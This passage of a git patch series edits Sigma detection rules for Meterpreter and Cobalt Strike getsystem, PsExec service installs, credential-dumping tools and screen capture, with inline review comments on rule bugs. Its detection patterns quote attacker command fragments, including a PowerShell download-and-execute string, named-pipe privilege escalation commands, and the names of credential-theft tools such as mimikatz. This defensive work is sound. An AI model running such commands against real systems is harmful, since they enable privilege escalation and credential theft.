\\.\pipe\5e120a + - ServiceFileName|contains|all: + - 'cmd.exe' + - '/c' + - 'echo' + - '\pipe\' + # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn + - ServiceFileName|contains|all: + - 'rundll32' + - '.dll,a' + - '/p:' + condition: selection_id and selection +fields: + - ComputerName + - SubjectDomainName + - SubjectUserName + - ServiceFileName +falsepositives: + - Highly unlikely +level: critical \ No newline at end of file diff --git a/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml b/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml new file mode 100644 index 00000000..db474a96 
--- /dev/null +++ b/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml @@ -0,0 +1,55 @@ +title: Meterpreter or Cobalt Strike Getsystem Service Installation +id: d585ab5a-6a69-49a8-96e8-4a726a54de46 +related: + - id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 + type: derived +description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation +author: Teymur Kheirkhabarov, Ecco, Florian Roth +date: 2019/10/26 +modified: 2021/09/21 +references: + - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment + - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ +tags: + - attack.privilege_escalation + - attack.t1134 # an old one + - attack.t1134.001 + - attack.t1134.002 +id: d585ab5a-6a69-49a8-96e8-4a726a54de46 +logsource: + product: windows + category: driver_load +detection: + selection: + # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a + - ImagePath|contains|all: + - 'cmd' + - '/c' + - 'echo' + - '\pipe\' + # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + - ImagePath|contains|all: + - '%COMSPEC%' + - '/c' + - 'echo' + - '\pipe\' + # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + - ImagePath|contains|all: + - 'cmd.exe' + - '/c' + - 'echo' + - '\pipe\' + # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn + - ImagePath|contains|all: + - 'rundll32' + - '.dll,a' + - '/p:' + condition: selection +fields: + - ComputerName + - SubjectDomainName + - SubjectUserName + - ImagePath +falsepositives: + - Highly unlikely +level: critical \ No newline at end of file From bf9bc03258efd1df23b27d9697102ab9d58c0777 Mon Sep 17 00:00:00 2001 
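Review bot: The new driver_load rule carries `id: d585ab5a-6a69-49a8-96e8-4a726a54de46` twice, once at the top and again just before `logsource:`; a duplicate YAML key is rejected by some loaders and silently overwritten by others, so the second copy should go (patch 1027 later in this series removes it). Beyond that, the selection matches `ImagePath|contains|all` patterns such as `cmd`, `/c`, `echo`, `\pipe\` that describe a service command line, not a loaded driver image; as far as I know the generic driver_load log source exposes `ImageLoaded` rather than `ImagePath`, so this derived rule is unlikely to ever fire — confirm whether it should exist at all. The same field question applies to `driver_load_mal_creddumper.yml` added in patch 1032.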
From: Max Altgelt Date: Tue, 21 Sep 2021 15:29:28 +0200 Subject: [PATCH 1025/1367] chore: properly name and describe rules --- rules/linux/lnx_clear_syslog.yml | 4 ++-- .../powershell_memorydump_getstoragediagnosticinfo.yml | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/linux/lnx_clear_syslog.yml b/rules/linux/lnx_clear_syslog.yml index 4ca3a5a2..1c01a3a5 100644 --- a/rules/linux/lnx_clear_syslog.yml +++ b/rules/linux/lnx_clear_syslog.yml @@ -1,7 +1,7 @@ -title: Clearing syslog +title: Commands to Clear or Remove the Syslog id: e09eb557-96d2-4de9-ba2d-30f712a5afd3 status: experimental -description: Detects removal of the syslog +description: Detects specific commands commonly used to remove or empty the syslog author: Max Altgelt date: 2021/09/10 references: diff --git a/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml b/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml index a4b975e4..1207ffbf 100644 --- a/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml +++ b/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml @@ -1,7 +1,7 @@ -title: Live Memory Dump using Get-StorageDiagnosticInfo +title: Live Memory Dump Using Powershell id: cd185561-4760-45d6-a63e-a51325112cae status: experimental -description: Detects a Command used to dump the live memory of a Windows machine +description: Detects usage of a PowerShell command to dump the live memory of a Windows machine date: 2021/09/21 references: - https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo From b9d14ef55afffa0ac9455f72ead1f32c594d9267 Mon Sep 17 00:00:00 2001 
From: frack113 Date: Tue, 21 Sep 2021 16:02:47 +0200 Subject: [PATCH 1026/1367] split global win_metasploit_or_impacket_smb_psexec_service_install.yml --- ...or_impacket_smb_psexec_service_install.yml | 28 ++++--------- ...or_impacket_smb_psexec_service_install.yml | 40 +++++++++++++++++++ 2 files changed, 48 insertions(+), 20 deletions(-) rename {rules/windows/builtin => rules-unsupported}/win_metasploit_or_impacket_smb_psexec_service_install.yml (85%) create mode 100644 rules/windows/builtin/win_security_metasploit_or_impacket_smb_psexec_service_install.yml diff --git a/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml b/rules-unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml similarity index 85% rename from rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml rename to rules-unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml index 6b61aec6..2c386e11 100644 --- a/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml +++ b/rules-unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml @@ -1,9 +1,9 @@ -action: global title: Metasploit Or Impacket Service Installation Via SMB PsExec +id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0 description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation author: Bartlomiej Czyz, Relativity date: 2021/01/21 -modified: 2021/07/23 +modified: 2021/09/21 references: - https://bczyz1.github.io/2021/01/30/psexec.html tags: @@ -12,7 +12,12 @@ tags: - attack.t1570 - attack.execution - attack.t1569.002 +logsource: + product: windows + service: system detection: + selection: + EventID: 7045 selection_1: ServiceFileName|re: '^%systemroot%\\[a-zA-Z]{8}\.exe$' ServiceName|re: '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' 
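Review bot: The file moved to `rules-unsupported/` still pairs `logsource: service: system` and `EventID: 7045` with `ServiceFileName|re` and `ServiceName|re`, while the other System-log splits in this series rename the match field to `ImagePath` for 7045; nothing in the file records why it is unsupported, so a one-line comment at the top stating the reason (presumably the field-name mismatch — confirm) would save the next reader from re-deriving it. The detection block of the second hunk continues outside this line.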
@@ -29,21 +34,4 @@ fields: - ServiceFileName falsepositives: - Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name -level: high ---- -id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0 -logsource: - product: windows - service: system -detection: - selection: - EventID: 7045 ---- -id: 6fb63b40-e02a-403e-9ffd-3bcc1d749442 -logsource: - product: windows - service: security -detection: - selection: - EventID: 4697 - +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_security_metasploit_or_impacket_smb_psexec_service_install.yml b/rules/windows/builtin/win_security_metasploit_or_impacket_smb_psexec_service_install.yml new file mode 100644 index 00000000..8ad72acf --- /dev/null +++ b/rules/windows/builtin/win_security_metasploit_or_impacket_smb_psexec_service_install.yml 
@@ -0,0 +1,40 @@ +title: Metasploit Or Impacket Service Installation Via SMB PsExec +id: 6fb63b40-e02a-403e-9ffd-3bcc1d7494425 +related: + - id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0 + type: derived +description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation +author: Bartlomiej Czyz, Relativity +date: 2021/01/21 +modified: 2021/07/23 +references: + - https://bczyz1.github.io/2021/01/30/psexec.html +tags: + - attack.lateral_movement + - attack.t1021.002 + - attack.t1570 + - attack.execution + - attack.t1569.002 +logsource: + product: windows + service: security +detection: + selection: + EventID: 4697 + selection_1: + ServiceFileName|re: '^%systemroot%\\[a-zA-Z]{8}\.exe$' + ServiceName|re: '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' + ServiceStartType: '3' # on-demand start, see https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4697 + ServiceType: '0x10' + filter: + ServiceName: 'PSEXESVC' + condition: selection and selection_1 and not filter +fields: + - ComputerName + - SubjectDomainName + - SubjectUserName + - ServiceName + - ServiceFileName +falsepositives: + - Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name +level: high \ No newline at end of file From 518d294ee91be4c670876d7ddc52020c9bcfb04a Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 16:06:27 +0200 Subject: [PATCH 1027/1367] fix id error --- ...eterpreter_or_cobaltstrike_getsystem_service_installation.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml b/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml index db474a96..b45519cb 100644 --- a/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml 
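Review bot: `id: 6fb63b40-e02a-403e-9ffd-3bcc1d7494425` has thirteen hex characters in its last group and is not a valid UUID; the id removed from the global rule in the previous hunk is `6fb63b40-e02a-403e-9ffd-3bcc1d749442`, so the trailing `5` looks like a typo and the line should read `id: 6fb63b40-e02a-403e-9ffd-3bcc1d749442`. The new file also keeps `modified: 2021/07/23` while the other split rules in this series set `modified: 2021/09/21`.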
+++ b/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml @@ -15,7 +15,6 @@ tags: - attack.t1134 # an old one - attack.t1134.001 - attack.t1134.002 -id: d585ab5a-6a69-49a8-96e8-4a726a54de46 logsource: product: windows category: driver_load From dde3b17c20e3a18c30abd019dba0f84d3c66033a Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 16:17:59 +0200 Subject: [PATCH 1028/1367] split global win_mal_service_installs.yml --- .../win_mal_service_installs.yml | 25 ++++---------- .../win_security_mal_service_installs.yml | 34 +++++++++++++++++++ 2 files changed, 40 insertions(+), 19 deletions(-) rename {rules/windows/builtin => rules-unsupported}/win_mal_service_installs.yml (82%) create mode 100644 rules/windows/builtin/win_security_mal_service_installs.yml diff --git a/rules/windows/builtin/win_mal_service_installs.yml b/rules-unsupported/win_mal_service_installs.yml similarity index 82% rename from rules/windows/builtin/win_mal_service_installs.yml rename to rules-unsupported/win_mal_service_installs.yml index e5fcbbab..5afed9f9 100644 --- a/rules/windows/builtin/win_mal_service_installs.yml +++ b/rules-unsupported/win_mal_service_installs.yml @@ -1,9 +1,9 @@ -action: global title: Malicious Service Installations +id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities. author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update) date: 2017/03/27 -modified: 2021/07/06 +modified: 2021/09/21 references: - https://awakesecurity.com/blog/threat-hunting-for-paexec/ - https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html 
@@ -17,13 +17,6 @@ tags: - car.2013-09-005 - attack.t1543.003 - attack.t1569.002 -detection: - condition: selection and 1 of malsvc_* -falsepositives: - - Penetration testing -level: critical ---- -id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a logsource: product: windows service: system @@ -38,13 +31,7 @@ detection: ServiceFileName|contains: 'net user' malsvc_apt29: ServiceName: 'Java(TM) Virtual Machine Support Service' ---- -id: cb062102-587e-4414-8efa-dbe3c7bf19c6 -logsource: - product: windows - service: security -detection: - selection: - EventID: 4697 - malsvc_apt29: - ServiceName: 'javamtsup' + condition: selection and 1 of malsvc_* +falsepositives: + - Penetration testing +level: critical \ No newline at end of file diff --git a/rules/windows/builtin/win_security_mal_service_installs.yml b/rules/windows/builtin/win_security_mal_service_installs.yml new file mode 100644 index 00000000..9071ed8d --- /dev/null +++ b/rules/windows/builtin/win_security_mal_service_installs.yml 
@@ -0,0 +1,34 @@ +title: Malicious Service Installations +id: cb062102-587e-4414-8efa-dbe3c7bf19c6 +related: + - id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a + type: derived +description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities. +author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update) +date: 2017/03/27 +modified: 2021/09/21 +references: + - https://awakesecurity.com/blog/threat-hunting-for-paexec/ + - https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html + - https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1003 + - attack.t1035 # an old one + - attack.t1050 # an old one + - car.2013-09-005 + - attack.t1543.003 + - attack.t1569.002 +logsource: + product: windows + service: security +detection: + selection: + EventID: 4697 + malsvc_apt29: + ServiceName: 'javamtsup' + condition: selection and 1 of malsvc_* +falsepositives: + - Penetration testing +level: critical \ No newline at end of file From 46febf48b02d442fd85121edc51bddb5e2aeb7ba Mon Sep 17 00:00:00 2001 From: phantinuss Date: Tue, 21 Sep 2021 16:52:02 +0200 Subject: [PATCH 1029/1367] fix: remove rule, too many FPs and no better matching criteria --- .../sysmon_uac_bypass_cleanmgr_tmpfile.yml | 25 ------------------- 1 file changed, 25 deletions(-) delete mode 100644 rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml diff --git a/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml b/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml deleted file mode 100644 index b5cec569..00000000 --- a/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml +++ /dev/null 
@@ -1,25 +0,0 @@ -title: UAC Bypass Using Cleanmgr Temp File Creation -id: 6a8a8a65-15ac-4722-adb7-c93c213c180a -description: Detects the pattern of UAC bypass using cleanmgr.exe to create temporary files (UACMe 63) -author: Christian Burkard -date: 2021/08/30 -status: experimental -references: - - https://github.com/hfiref0x/UACME -tags: - - attack.defense_evasion - - attack.privilege_escalation - - attack.t1548.002 -logsource: - category: file_event - product: windows -detection: - selection: - Image: 'C:\Windows\system32\cleanmgr.exe' - TargetFilename|startswith: 'C:\Users\' - TargetFilename|contains: '\AppData\Local\Temp\' - TargetFilename|endswith: '.dll' - condition: selection -falsepositives: - - Unknown -level: high From d884f774f9020b45924ff8fbf49fd434e52728f1 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 21 Sep 2021 18:01:46 +0200 Subject: [PATCH 1030/1367] Update powershell_memorydump_getstoragediagnosticinfo.yml --- .../powershell_memorydump_getstoragediagnosticinfo.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml b/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml index 1207ffbf..c31fc802 100644 --- a/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml +++ b/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml @@ -15,8 +15,8 @@ detection: dump: EventID: 4104 ScriptBlockText|contains|all: - - Get-StorageDiagnosticInfo - - -IncludeLiveDump + - 'Get-StorageDiagnosticInfo' + - '-IncludeLiveDump' condition: dump falsepositives: - Diagnostics From e20e5033e734271981faeb3a2be3f7ec66615e8a Mon Sep 17 00:00:00 2001 
From: Pawel Mazur Date: Tue, 21 Sep 2021 18:55:48 +0200 Subject: [PATCH 1031/1367] New Rule - Linux - Auditd - Screencapture with Import Tool --- .../lnx_auditd_screencapture_import.yml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_screencapture_import.yml diff --git a/rules/linux/auditd/lnx_auditd_screencapture_import.yml b/rules/linux/auditd/lnx_auditd_screencapture_import.yml new file mode 100644 index 00000000..e411de68 --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_screencapture_import.yml @@ -0,0 +1,37 @@ +title: Screen Capture with Import Tool +id: dbe4b9c5-c254-4258-9688-d6af0b7967fd +description: Detects adversary creating screen capture of a desktop with Import Tool. Highly recommended using rule on servers, due to high usage of screenshot utilities on user workstations. ImageMagick must be installed. +author: 'Pawel Mazur' +status: experimental +date: 2021/09/21 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md + - https://attack.mitre.org/techniques/T1113/ + - https://linux.die.net/man/1/import + - https://imagemagick.org/ +logsource: + product: linux + service: auditd +detection: + import: + type: EXECVE + a0: import + import_window_root: + a1: '-window' + a2: 'root' + a3|endswith: + - '.png' + - '.jpg' + - '.jpeg' + import_no_window_root: + a1|endswith: + - '.png' + - '.jpg' + - '.jpeg' + condition: import and (import_window_root or import_no_window_root) +tags: + - attack.collection + - attack.t1113 +falsepositives: + - Legitimate use of screenshot utility +level: low \ No newline at end of file From 06a07605fd4a0bf0a70c819141ddecce013b319e Mon Sep 17 00:00:00 2001 
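Review bot: `a0: import` is an exact match on the first execve argument, so an invocation by absolute path (a constructed example: `a0` logged as `/usr/bin/import`) would not match; if that form matters for the deployment, consider an additional `a0|endswith: '/import'` alternative and confirm against real auditd EXECVE records how `a0` is recorded. `import_no_window_root` only checks `a1|endswith` for an image extension, so any `import something.png` call satisfies it; that is consistent with `level: low`, but is worth stating under `falsepositives`.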
From: frack113 Date: Tue, 21 Sep 2021 19:31:52 +0200 Subject: [PATCH 1032/1367] split global win_mal_creddumper.yml --- rules/windows/builtin/win_mal_creddumper.yml | 40 +++-------------- .../builtin/win_security_mal_creddumper.yml | 44 +++++++++++++++++++ .../driver_load_mal_creddumper.yml | 40 +++++++++++++++++ 3 files changed, 91 insertions(+), 33 deletions(-) create mode 100644 rules/windows/builtin/win_security_mal_creddumper.yml create mode 100644 rules/windows/driver_load/driver_load_mal_creddumper.yml diff --git a/rules/windows/builtin/win_mal_creddumper.yml b/rules/windows/builtin/win_mal_creddumper.yml index 76cc287b..96e39a84 100644 --- a/rules/windows/builtin/win_mal_creddumper.yml +++ b/rules/windows/builtin/win_mal_creddumper.yml @@ -1,5 +1,5 @@ -action: global title: Credential Dumping Tools Service Execution +id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed description: Detects well-known credential dumping tools execution via service execution events author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community date: 2017/03/05 @@ -18,18 +18,13 @@ tags: - attack.t1035 # an old one - attack.t1569.002 - attack.s0005 +logsource: + product: windows + service: system detection: selection: - - ServiceName|contains: - - 'fgexec' - - 'wceservice' - - 'wce service' - - 'pwdump' - - 'gsecdump' - - 'cachedump' - - 'mimikatz' - - 'mimidrv' - - ImagePath|contains: + EventID: 7045 + ImagePath|contains: - 'fgexec' - 'dumpsvc' - 'cachedump' 
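Review bot: The rewritten `selection` drops the `ServiceName|contains` alternative (`wceservice`, `wce service`, `mimikatz`, and the rest) and keeps only the `ImagePath|contains` list, so a credential-dumping service whose binary name is innocuous but whose service name is one of those strings is no longer detected. If the intent was only to add `EventID: 7045`, keep both alternatives as a list of maps: `- EventID: 7045` with `  ServiceName|contains:` and `- EventID: 7045` with `  ImagePath|contains:`. If the removal is deliberate, the commit message (`split global …`) does not say so and should.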
@@ -40,25 +35,4 @@ detection: condition: selection falsepositives: - Legitimate Administrator using credential dumping tool for password recovery -level: high ---- -id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed -logsource: - product: windows - service: system -detection: - selection: - EventID: 7045 ---- -id: df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2 -logsource: - product: windows - category: driver_load ---- -id: f0d1feba-4344-4ca9-8121-a6c97bd6df52 -logsource: - product: windows - service: security -detection: - selection: - EventID: 4697 +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_security_mal_creddumper.yml b/rules/windows/builtin/win_security_mal_creddumper.yml new file mode 100644 index 00000000..dce5b9e8 --- /dev/null +++ b/rules/windows/builtin/win_security_mal_creddumper.yml @@ -0,0 +1,44 @@ +title: Credential Dumping Tools Service Execution +id: f0d1feba-4344-4ca9-8121-a6c97bd6df52 +related: + - id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed + type: derived +description: Detects well-known credential dumping tools execution via service execution events +author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community +date: 2017/03/05 +modified: 2021/03/18 +references: + - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment +tags: + - attack.credential_access + - attack.execution + - attack.t1003 # an old one + - attack.t1003.001 + - attack.t1003.002 + - attack.t1003.004 + - attack.t1003.005 + - attack.t1003.006 + - attack.t1035 # an old one + - attack.t1569.002 + - attack.s0005 +logsource: + product: windows + service: security +detection: + selection: + EventID: 4697 + ImagePath|contains: + - 'fgexec' + - 'dumpsvc' + - 'cachedump' + - 'mimidrv' + - 'gsecdump' + - 'servpw' + - 'pwdump' + condition: selection +falsepositives: + - Legitimate Administrator using credential dumping tool for password recovery +level: high + + + 
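Review bot: The new Security-log rule matches `ImagePath|contains` under `EventID: 4697`, whereas every other 4697 rule in this series matches `ServiceFileName` (for example `win_security_meterpreter_or_cobaltstrike_getsystem_service_installation.yml`), so as written the selection would not hit a 4697 event; the line should be `ServiceFileName|contains:`. Patch 1034 at the end of this chunk touches this file with a four-line change labelled "fix field name and date", which presumably corrects it. The file also ends with three empty `+` lines that should be dropped.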
diff --git a/rules/windows/driver_load/driver_load_mal_creddumper.yml b/rules/windows/driver_load/driver_load_mal_creddumper.yml new file mode 100644 index 00000000..64f7a024 --- /dev/null +++ b/rules/windows/driver_load/driver_load_mal_creddumper.yml @@ -0,0 +1,40 @@ +title: Credential Dumping Tools Service Execution +id: df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2 +related: + - id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed + type: derived +description: Detects well-known credential dumping tools execution via service execution events +author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community +date: 2017/03/05 +modified: 2021/03/18 +references: + - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment +tags: + - attack.credential_access + - attack.execution + - attack.t1003 # an old one + - attack.t1003.001 + - attack.t1003.002 + - attack.t1003.004 + - attack.t1003.005 + - attack.t1003.006 + - attack.t1035 # an old one + - attack.t1569.002 + - attack.s0005 +logsource: + product: windows + category: driver_load +detection: + selection: + ImagePath|contains: + - 'fgexec' + - 'dumpsvc' + - 'cachedump' + - 'mimidrv' + - 'gsecdump' + - 'servpw' + - 'pwdump' + condition: selection +falsepositives: + - Legitimate Administrator using credential dumping tool for password recovery +level: high From d37685d7cc5b107dbd4fef19e62b66881b0fa490 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 19:36:34 +0200 Subject: [PATCH 1033/1367] split global win_cobaltstrike_service_installs.yml --- .../win_cobaltstrike_service_installs.yml | 48 ++++++++----------- ...security_cobaltstrike_service_installs.yml | 43 +++++++++++++++++ 2 files changed, 62 insertions(+), 29 deletions(-) create mode 100644 rules/windows/builtin/win_security_cobaltstrike_service_installs.yml 
diff --git a/rules/windows/builtin/win_cobaltstrike_service_installs.yml b/rules/windows/builtin/win_cobaltstrike_service_installs.yml index ca2308ab..6dbf836f 100644 --- a/rules/windows/builtin/win_cobaltstrike_service_installs.yml +++ b/rules/windows/builtin/win_cobaltstrike_service_installs.yml @@ -1,5 +1,5 @@ -action: global title: CobaltStrike Service Installations +id: 5a105d34-05fc-401e-8553-272b45c1522d description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement author: Florian Roth, Wojciech Lesicki references: @@ -7,6 +7,7 @@ references: - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/ - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ date: 2021/05/26 +modified: 2021/09/21 tags: - attack.execution - attack.privilege_escalation 
@@ -14,37 +15,26 @@ tags: - attack.t1021.002 - attack.t1543.003 - attack.t1569.002 -detection: - selection1: - ServiceFileName|contains|all: - - 'ADMIN$' - - '.exe' - selection2: - ServiceFileName|contains|all: - - '%COMSPEC%' - - 'start' - - 'powershell' - selection3: - ServiceFileName|contains: 'powershell -nop -w hidden -encodedcommand' - selection4: - ServiceFileName|base64offset|contains: "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:" - condition: selection_id and (selection1 or selection2 or selection3 or selection4) -falsepositives: - - Unknown -level: critical ---- -id: 5a105d34-05fc-401e-8553-272b45c1522d logsource: product: windows service: system detection: selection_id: EventID: 7045 ---- -id: d7a95147-145f-4678-b85d-d1ff4a3bb3f6 -logsource: - product: windows - service: security -detection: - selection_id: - EventID: 4697 \ No newline at end of file + selection1: + ImagePath|contains|all: + - 'ADMIN$' + - '.exe' + selection2: + ImagePath|contains|all: + - '%COMSPEC%' + - 'start' + - 'powershell' + selection3: + ImagePath|contains: 'powershell -nop -w hidden -encodedcommand' + selection4: + ImagePath|base64offset|contains: "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:" + condition: selection_id and (selection1 or selection2 or selection3 or selection4) +falsepositives: + - Unknown +level: critical \ No newline at end of file diff --git a/rules/windows/builtin/win_security_cobaltstrike_service_installs.yml b/rules/windows/builtin/win_security_cobaltstrike_service_installs.yml new file mode 100644 index 00000000..859a9d20 --- /dev/null +++ b/rules/windows/builtin/win_security_cobaltstrike_service_installs.yml 
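Review bot: The system-log half of this split carries no `related` entry back to the security half, while the new win_security_cobaltstrike_service_installs.yml in the same commit links to 5a105d34-05fc-401e-8553-272b45c1522d with `type: derived`, and the driver_load creddumper rule at the top of this chunk links to its origin as well. Adding `related:` / `    - id: d7a95147-145f-4678-b85d-d1ff4a3bb3f6` / `      type: derived` after the `id` line keeps the pair discoverable from either side. The same one-sided or missing cross-reference appears in the network-scan split (PATCH 1035), both DNS splits (PATCH 1036 and 1037) and the cleartext-protocol split (PATCH 1038).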
@@ -0,0 +1,43 @@ +title: CobaltStrike Service Installations +id: d7a95147-145f-4678-b85d-d1ff4a3bb3f6 +related: + - id: 5a105d34-05fc-401e-8553-272b45c1522d + type: derived +description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement +author: Florian Roth, Wojciech Lesicki +references: + - https://www.sans.org/webcasts/119395 + - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/ + - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ +date: 2021/05/26 +modified: 2021/09/21 +tags: + - attack.execution + - attack.privilege_escalation + - attack.lateral_movement + - attack.t1021.002 + - attack.t1543.003 + - attack.t1569.002 +logsource: + product: windows + service: security +detection: + selection_id: + EventID: 4697 + selection1: + ServiceFileName|contains|all: + - 'ADMIN$' + - '.exe' + selection2: + ServiceFileName|contains|all: + - '%COMSPEC%' + - 'start' + - 'powershell' + selection3: + ServiceFileName|contains: 'powershell -nop -w hidden -encodedcommand' + selection4: + ServiceFileName|base64offset|contains: "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:" + condition: selection_id and (selection1 or selection2 or selection3 or selection4) +falsepositives: + - Unknown +level: critical \ No newline at end of file From b5e91d7185247dfe96063573f7e3707292ee6164 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 19:41:46 +0200 Subject: [PATCH 1034/1367] fix field name and date --- rules/windows/builtin/win_mal_creddumper.yml | 2 +- rules/windows/builtin/win_security_mal_creddumper.yml | 4 ++-- rules/windows/driver_load/driver_load_mal_creddumper.yml | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/builtin/win_mal_creddumper.yml b/rules/windows/builtin/win_mal_creddumper.yml index 96e39a84..e7dd86a0 100644 --- a/rules/windows/builtin/win_mal_creddumper.yml 
+++ b/rules/windows/builtin/win_mal_creddumper.yml @@ -3,7 +3,7 @@ id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed description: Detects well-known credential dumping tools execution via service execution events author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community date: 2017/03/05 -modified: 2021/03/18 +modified: 2021/09/21 references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment tags: diff --git a/rules/windows/builtin/win_security_mal_creddumper.yml b/rules/windows/builtin/win_security_mal_creddumper.yml index dce5b9e8..d3053669 100644 --- a/rules/windows/builtin/win_security_mal_creddumper.yml +++ b/rules/windows/builtin/win_security_mal_creddumper.yml @@ -6,7 +6,7 @@ related: description: Detects well-known credential dumping tools execution via service execution events author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community date: 2017/03/05 -modified: 2021/03/18 +modified: 2021/09/21 references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment tags: @@ -27,7 +27,7 @@ logsource: detection: selection: EventID: 4697 - ImagePath|contains: + ServiceFileName|contains: - 'fgexec' - 'dumpsvc' - 'cachedump' diff --git a/rules/windows/driver_load/driver_load_mal_creddumper.yml b/rules/windows/driver_load/driver_load_mal_creddumper.yml index 64f7a024..5ff88625 100644 --- 